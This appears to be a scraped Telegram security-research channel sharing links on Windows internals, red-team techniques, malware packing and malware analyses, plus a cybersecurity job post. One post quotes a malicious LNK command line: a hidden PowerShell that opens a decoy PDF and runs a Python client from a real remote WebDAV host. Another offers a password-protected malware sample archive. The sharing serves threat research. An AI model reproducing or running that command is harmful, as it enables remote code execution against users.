Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
❤4👾1
Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
👍2
Local Admin In Less Than 60 Seconds (Part 1)
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
❤3
Snowy Days & The Malware Packing Ways
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
Source Byte
I gathered samples related to Attack Against Iran’s State Broadcaster if you have access to those three missing files plz share it in group file pass : infected credits : vx-underground MalwareBazaar checkpoint
Iran’s State Broadcaster.zip
4.2 MB
Thanks " a gh " for sharing missing files ( two windows event logs )
password is
password is
infected❤12🔥2👍1
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
👍4❤3🔥3
Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
👍5
or even run python remotely
-w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"👍5
Source Byte
or even run python remotely -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk
2.9 KB
🔥5👍2
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] .
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
🔥13👾7❤1⚡1👍1
Source Byte
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] . [ + ] Familiarity with reverse engineering and malware analysis. [ + ]…
Hi
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
😁5👍1💋1👾1
Hijack the TypeLib. New COM persistence technique
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
❤2🔥2
Agent Tesla Analysis [Part 1: Unpacking]
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
❤2🔥2👾1
Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/
🤣4👍2❤1🔥1😈1
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
🔥2🤮2👾2👍1🥱1
1734722992877.pdf
1 MB
Exploring Kernel Callbacks in Windows for Red Teamers / Developers
Forwarded from Infosec Fortress
The Kernel Hacker's Guide to the Galaxy
Automating Exploit Engineering Workflows
H2HC 2024
#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress
Automating Exploit Engineering Workflows
H2HC 2024
#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress
👍3
Forwarded from /mdre/
Please open Telegram to view this post
VIEW IN TELEGRAM